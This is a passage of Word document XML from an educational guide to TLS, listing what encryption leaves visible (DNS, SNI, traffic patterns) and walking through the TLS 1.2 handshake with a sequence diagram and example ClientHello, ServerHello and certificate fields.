          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The domain name resolved before connecting is visible (unless using DoH/DoT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3237E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNI (Server Name Indication):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> The hostname in the TLS Client Hello is sent in plaintext (visible to the network). Encrypted Client Hello (ECH) is being standardized to fix this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A57442" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Packet sizes and timing patterns can reveal information (e.g., which page you're viewing on a known site).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69FFDC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="876"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The server itself:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> TLS protects data in transit, not data at rest on the server. A compromised server still exposes everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46898CBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="3A759A21">
          <v:rect id="_x0000_i3977" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E90521" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. The TLS Handshake — Complete Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77768DFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 TLS 1.2 Handshake (Full)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A321C4C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the detailed step-by-step of what happens before a single byte of HTTP data is exchanged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F744CFB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9E397" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client                                          Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D10B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5715DE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── ClientHello ─────────────────────────────&gt;|  (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEEDA3C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3721E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ServerHello ─────────────────────────────|  (2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CDA10" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── Certificate ─────────────────────────────|  (3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE65960" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ServerKeyExchange ───────────────────────|  (4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF8F3F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ServerHelloDone ─────────────────────────|  (5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44271AE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F3662" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── ClientKeyExchange ───────────────────────&gt;|  (6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331615C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── ChangeCipherSpec ────────────────────────&gt;|  (7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714D8A3E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── Finished (encrypted) ────────────────────&gt;|  (8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD5366" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68355907" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── ChangeCipherSpec ────────────────────────|  (9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A54DBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── Finished (encrypted) ────────────────────| (10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA43097" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |                                               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8DE08" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |──── HTTP Request (encrypted) ────────────────&gt;|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069AB632" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  |&lt;──── HTTP Response (encrypted) ───────────────|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784C551B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total: 2 round trips before any data flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369EED0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-step internal details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FB5ABC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(1) ClientHello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D4A87B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350236B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- TLS version: 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B8435" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Client Random: 32 bytes of randomness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBB1E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Session ID: (empty for new connection, or previous ID for resumption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4FB29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">- Cipher Suites: [TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643FA41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                  TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E48FD1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Compression Methods: [null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E16AC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168A4D8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - server_name (SNI): "api.example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688BC92" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - supported_groups: [x25519, secp256r1, secp384r1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B71F87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - signature_algorithms: [rsa_pss_sha256, ecdsa_secp256r1_sha256, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A416CDC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - application_layer_protocol_negotiation (ALPN): ["h2", "http/1.1"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA26A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The client offers its capabilities — which TLS version, which cipher suites it supports, the server name (SNI for virtual hosting), and preferred key exchange curves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A91894" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(2) ServerHello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0720A5D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A869B79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- TLS version: 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6907222F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Server Random: 32 bytes of randomness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B74BE0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Session ID: &lt;generated&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6B24D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Selected Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505343AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Selected Compression: null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25587967" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E361C50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - application_layer_protocol_negotiation: "h2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9163D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server selects ONE cipher suite from the client's list (the strongest mutually supported one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506C839" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(3) Certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C1709" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The server sends its X.509 certificate chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C966D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133AB7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>- Server Certificate (for api.example.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646B6BA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Subject: CN=api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DCA8A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Issuer: Let's Encrypt Authority X3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693EF983" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Public Key: RSA 2048-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF7178B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Validity: 2026-04-28 to 2026-07-27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EFA20" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  - Subject Alternative Names: api.example.com, *.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE742B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
